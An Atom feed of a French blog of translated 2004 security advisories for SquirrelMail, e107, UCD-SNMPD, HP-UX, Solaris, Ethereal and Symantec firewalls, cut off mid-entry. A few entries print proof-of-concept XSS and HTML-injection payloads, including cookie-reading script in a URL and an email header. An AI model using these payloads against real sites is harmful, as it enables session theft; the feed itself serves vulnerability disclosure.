<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6913127</id><updated>2011-04-21T20:44:56.872+02:00</updated><title type='text'>Advisories de sécurité</title><subtitle type='html'>Sécurité Internet - Alertes - Exploits - advisory</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://securite-informatique.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6913127.post-108676999688242568</id><published>2004-06-09T10:32:00.001+02:00</published><updated>2004-06-09T10:33:57.036+02:00</updated><title type='text'>SquirrelMail Email Header HTML Injection Vulnerability </title><content type='html'>Sujet: SquirrelMail Email Header HTML Injection Vulnerability &lt;br /&gt;Versions: SquirrelMail SquirrelMail 1.4.* &amp; 1.5 except 1.4.3 &lt;br /&gt;Auteur: Roman Medina [roman@rs-labs.com]. &lt;br /&gt;Traducteur FR: Z4rK &lt;br /&gt;Date: 3 juin 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;SquirrelMail est enclin a une vulnérabilité permettant l'injection d'un code HTML arbitraire au niveau de l'en-tête des emails. Cette vulnérabilité est due à un mauvais filtrage au niveau des possibilités d'écriture de celle-ci, permettant ainsi l'insertion du code malveillant.&lt;br /&gt;&lt;br /&gt;Un attaquant peut exploiter cette vulnérabilité pour accéder aux&lt;br /&gt;cookies de l'utilisateur ciblé ; la révélation de l'email personnel est possible. D'autres attaques sont également possibles. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucune exploit n'est exigée pour exploiter cette vulnérabilité. On rapporteque l'exploitation réussie dépend du serveur d'IMAP utilisé pouranalyser l'email offensant. La preuve suivante de la valeur de concept du 'Contenu-Type 'a été fournie : &lt;br /&gt;&lt;br /&gt;Content-Type: application/octet-stream"window.alert(document.cookie"; name=top_secret.pdf &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;L'upgrade du soft est disponible a l'adresse suivante:&lt;br /&gt;&lt;br /&gt;http://www.squirrelmail.org/download.php &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108676999688242568?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676999688242568'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676999688242568'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_06_01_archive.html#108676999688242568' title='SquirrelMail Email Header HTML Injection Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108676996377191828</id><published>2004-06-09T10:32:00.000+02:00</published><updated>2004-06-09T10:32:43.773+02:00</updated><title type='text'>SquirrelMail Folder Name Cross-Site Scripting Vulnerability</title><content type='html'>Sujet: SquirrelMail Folder Name Cross-Site Scripting Vulnerability &lt;br /&gt;Versions: http://www.securityfocus.com/bid/10246 &lt;br /&gt;Auteur: Alvin Alex &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 30 Avril 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;SquirrelMail possède une faille CSS (cross site scripting) qui peut-être utilisée en manipulant la variable d'affichage du nom de répertoire ( généralement $mailbox ).&lt;br /&gt;Ce problème vient du fait que l'application ne filtre pas proprement le champs utilisé avant de l'inclure dans une page dynamique.&lt;br /&gt;&lt;br /&gt;On peut notamment l'utiliser pour le vol de cookie, mais d'autres attaques peuvent être realisées. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Ce n'est pas un exploit proprement dit, mais voila un petit exemple d'url faillible:&lt;br /&gt;http://www.example.com/mail/src/compose.php?mailbox="&gt;&amp;lt;script&amp;gt;window.alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Mettre à jour SquirrelMail:&lt;br /&gt;SquirrelMail Upgrade SquirrelMail 1.4.3-RC1&lt;br /&gt;http://sourceforge.net/project/showfiles.php?group_id=311&amp;package_id=334&amp;release_id=237332 &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108676996377191828?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676996377191828'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676996377191828'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_06_01_archive.html#108676996377191828' title='SquirrelMail Folder Name Cross-Site Scripting Vulnerability'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108676991613346268</id><published>2004-06-09T10:31:00.001+02:00</published><updated>2004-06-09T10:31:56.133+02:00</updated><title type='text'>UCD-SNMPD Command Line Parsing Local Buffer Overflow Vulnerability </title><content type='html'>Sujet: UCD-SNMPD Command Line Parsing Local Buffer Overflow Vulnerability &lt;br /&gt;Versions: UCD-SNMP UCD-SNMP 4.2.6 &lt;br /&gt;Auteur: priest priest &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 21 Mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Le serveur SNMPd UCD-SNMP possède une faille de type buffer overflow due à un mauvais filtrage des paramètres dans les lignes de commandes.&lt;br /&gt;Ceci vient du fait que l'application ne définit pas clairement la taille des arguments que donnent les utilisateurs avant de les copier dans la mémoire tampon.&lt;br /&gt;Ce problème permet à une personne hostile d'influencer le bon fonctionnement du serveur SNMPd et donc de finallement pouvoir éxécuter un code arbitraire avec les droits du serveur.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Pas d'exploit disponible pour le moment. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Pas de solution disponible pour le moment. &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108676991613346268?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676991613346268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676991613346268'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_06_01_archive.html#108676991613346268' title='UCD-SNMPD Command Line Parsing Local Buffer Overflow Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108676987853528155</id><published>2004-06-09T10:31:00.000+02:00</published><updated>2004-06-09T10:31:18.536+02:00</updated><title type='text'>e107 Website System Log.PHP HTML Injection Vulnerability </title><content type='html'>Sujet: e107 Website System Log.PHP HTML Injection Vulnerability &lt;br /&gt;Versions: e107 website system 0.545, 0.554, 0.555 Beta, 0.603, 0.6 10, 0.6 11, 0.6 12, 0.6 13, 0.6 14, 0.6 15, 0.6 15a &lt;br /&gt;Auteur: Chinchilla &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 21 Mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;e107 website system est sujet d'une faille de type injection de HTML.&lt;br /&gt;Ce problème est dû à l'incapacité de l'application de bien filtrer les données des champs que l'utilisateur utilise. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Il est possible d'injecter du code hostile de type HTML, ou autres langages interprétés tels que JavaScript, VBScript etc .. en mettant ce code en parametre dans l'url au niveau de la page log.php&lt;br /&gt;&lt;br /&gt;L'application emmagasine le code injecté, qui peut-être interprété dans le navigateur d'un utilisateur qui ne se doute de rien en allant sur la page de log infectée.&lt;br /&gt;&lt;br /&gt;Ce n'est pas vraiment un exploit, mais une url de ce genre suffit:&lt;br /&gt;&lt;br /&gt;http://www.example.com/e107_plugins/log/log.php?referer=code&lt;br&gt;goes&lt;here&gt;&amp;color=24&amp;eself=http://www.example.com/stats.php&amp;res=1341X1341&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Pour l'instant aucune solution n'est disponible &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108676987853528155?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676987853528155'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676987853528155'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_06_01_archive.html#108676987853528155' title='e107 Website System Log.PHP HTML Injection Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108676984260020200</id><published>2004-06-09T10:30:00.000+02:00</published><updated>2004-06-09T10:30:42.600+02:00</updated><title type='text'>HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions </title><content type='html'>Sujet: HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions &lt;br /&gt;Versions: HP-UX 11.x &lt;br /&gt;Auteur: HP &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 14 mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;HP a rapporté une vulnérabilité dans HP-UX, qui peut être exploité par des personnes mal intentionnées, pour manipuler le contenu de certains fichiers en local.&lt;br /&gt;&lt;br /&gt;La vulnérabilité est due aux permissions non sécurisées d'un répertoire sur les systèmes utilisant B6848AB GTK+ Support Librairies. Le problème concerne les fichiers source qui sont modifiables par n'importe quel utilisateur.&lt;br /&gt;&lt;br /&gt;Une exploitation réussie peut permettre l'exécution de code arbitraire avec des privilèges si les nouvelles bibliothèques sont programmées depuis les sources corrompues.&lt;br /&gt;&lt;br /&gt;La vulnérabilité concerne HP-UX B.11.00 et B.11.11 si les Support Libraries B6848AB GTK+ sont installées. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Réinstaller B6848AB et définir des permissions d'accès correctes.&lt;br /&gt;&lt;br /&gt;Installer la révisison B6848AB 1.4gm. 46 &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108676984260020200?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676984260020200'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108676984260020200'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_06_01_archive.html#108676984260020200' title='HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108520315480912742</id><published>2004-05-22T07:18:00.001+02:00</published><updated>2004-05-22T07:19:14.810+02:00</updated><title type='text'>HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions </title><content type='html'>Sujet: HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions &lt;br /&gt;Versions: HP-UX 11.x &lt;br /&gt;Auteur: HP &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 14 mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;HP a rapporté une vulnérabilité dans HP-UX, qui peut être exploité par des personnes mal intentionnées, pour manipuler le contenu de certains fichiers en local.&lt;br /&gt;&lt;br /&gt;La vulnérabilité est due aux permissions non sécurisées d'un répertoire sur les systèmes utilisant B6848AB GTK+ Support Librairies. Le problème concerne les fichiers source qui sont modifiables par n'importe quel utilisateur.&lt;br /&gt;&lt;br /&gt;Une exploitation réussie peut permettre l'exécution de code arbitraire avec des privilèges si les nouvelles bibliothèques sont programmées depuis les sources corrompues.&lt;br /&gt;&lt;br /&gt;La vulnérabilité concerne HP-UX B.11.00 et B.11.11 si les Support Libraries B6848AB GTK+ sont installées. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Réinstaller B6848AB et définir des permissions d'accès correctes.&lt;br /&gt;&lt;br /&gt;Installer la révisison B6848AB 1.4gm. 46 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: HP &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11615/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108520315480912742?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520315480912742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520315480912742'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108520315480912742' title='HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108520312626516945</id><published>2004-05-22T07:18:00.000+02:00</published><updated>2004-05-22T07:18:46.266+02:00</updated><title type='text'>Sun Solaris SMC Web Server File Enumeration Security Issue </title><content type='html'>Sujet: Sun Solaris SMC Web Server File Enumeration Security Issue &lt;br /&gt;Versions: Sun Solaris 8 Sun Solaris 9 &lt;br /&gt;Auteur: Jon Hart &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 14 mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Il a été rapporté une faille de sécurité dans Sun Solaris, qui peut être exploité par des personnes mal intentionnées pour énumérer des fichiers sur un système infecté.&lt;br /&gt;&lt;br /&gt;La faille concerne le serveur Web SMC (SUN MANAGEMENT CONSOLE) qui retourne différents messages d'erreurs selon que le fichier existe en dehors du DocumentBase ou non. Cela peut être exploité via une attaque transversale classique.&lt;br /&gt;&lt;br /&gt;Cette faille concerne Sun Solaris 8 et 9 sur les plateformes SPARC et x86. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Cette faille de sécurité a été réparée pour Solaris 9 grâce aux patchs :&lt;br /&gt;&lt;br /&gt;SPARC&lt;br /&gt;http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116807&amp;rev=01&lt;br /&gt;&lt;br /&gt;x86&lt;br /&gt;http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116808&amp;rev=01 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Jon Hart &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11616/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108520312626516945?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520312626516945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520312626516945'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108520312626516945' title='Sun Solaris SMC Web Server File Enumeration Security Issue '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108520309168774694</id><published>2004-05-22T07:17:00.000+02:00</published><updated>2004-05-22T07:18:11.686+02:00</updated><title type='text'>Ethereal Multiple Vulnerabilities </title><content type='html'>Sujet: Ethereal Multiple Vulnerabilities &lt;br /&gt;Versions: Ethereal 0.x &lt;br /&gt;Auteur: Ethereal &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 14 mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Description :&lt;br /&gt;*************&lt;br /&gt;De multiples vulnérabilités ont été découvertes dans Ethereal. Elles peuvent être exploitées par des personnes mal intentionées pour causer un DoS (Denial-of-Service).&lt;br /&gt;&lt;br /&gt;1) Une erreur au sein de la gestion des paquets SIP peut, sous certaines conditions, crasher l'application. Cette vulnérabilité affecte la version 0.10.3.&lt;br /&gt;&lt;br /&gt;2) Une erreur au sein du protocole AIM peut être exploitée pour crasher l'application. Cette vulnérabilité affecte la version 0.10.3.&lt;br /&gt;&lt;br /&gt;3) Une erreur du NULL au sein du protocole SPNEGO peut être exploitée pour crasher l'application. Cette vulnérabilité affecte les versions 0.9.8. à 0.10.3.&lt;br /&gt;&lt;br /&gt;4) Une erreur "boundary" au sein du protocole MMSE peut être exploitée pour causer un buffer overflow. Cette attaque peut permettre d'exécuter du code arbitraire sur un systême vulnérable.&lt;br /&gt;&lt;br /&gt;Cette vulnérabilité affecte les versions 0.10.1. à 0.10.3.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Mise à jour vers la version 0.10.4. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Ethereal &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11608/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108520309168774694?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520309168774694'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520309168774694'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108520309168774694' title='Ethereal Multiple Vulnerabilities '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108520305979354385</id><published>2004-05-22T07:16:00.000+02:00</published><updated>2004-05-22T07:17:39.793+02:00</updated><title type='text'>Symantec Client Firewall Products Multiple Vulnerabilities</title><content type='html'>Sujet: Symantec Client Firewall Products Multiple Vulnerabilities &lt;br /&gt;Versions: Symantec Norton Internet Security et Pro 2002, 2003, 2004; Symantec Norton Personal Firewall 2002, 2003, 2004; Symantec Norton AntiSpam 2004; Symantec Client Firewall 5.01, 5.1.1; Symantec Client Security 1.0, 1.1, 2.0 &lt;br /&gt;Auteur: Barnaby Jack, Karl Lynn et Derek Soeder, eEye Digital Security &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: parution le 12 Mai 2004 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;eEye Digital Security ont découvert de multiples vulnérabilités dans différents firewalls des produits Symantec.&lt;br /&gt;Ces trous de securité peuvent être exploités pour causer un Deni de Service ou compromettre le système cible.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;1/ Une erreur de limite est présente dans le pilote "SYMDNS.SYS" pendant le traitement des datagrammes NBNS (NetBIOS Name Service) et peut être exploitée pour provoquer &lt;br /&gt;un buffer overflow sur la pile en envoyant une réponse NBNS particulièrement modifiée à un système vulnérable.&lt;br /&gt;&lt;br /&gt;Si l'exploitation fonctionne, cela permet l'éxécution de code arbitraire avec les droits 0 du kernel, mais exige qu'il y ait le traffic NBNS (port 137/udp) d'autorisé (ce qui n'est pas le cas par défaut).&lt;br /&gt;&lt;br /&gt;2/ Une seconde erreur dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes DNS (Domain Name Service) qui peut être exploitée pour stopper le système en envoyant simplement une réponse DNS particulièrement modifiée au système vulnérable.&lt;br /&gt;&lt;br /&gt;3/ Troisieme erreur dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes NBNS qui peut être exploitée pour corrompre la mémoire en envoyant une réponse NBNS particulièrement modifiée au système vulnérable.&lt;br /&gt;&lt;br /&gt;Si l'exploitation a réussi, normalement cela permet l'éxécution de 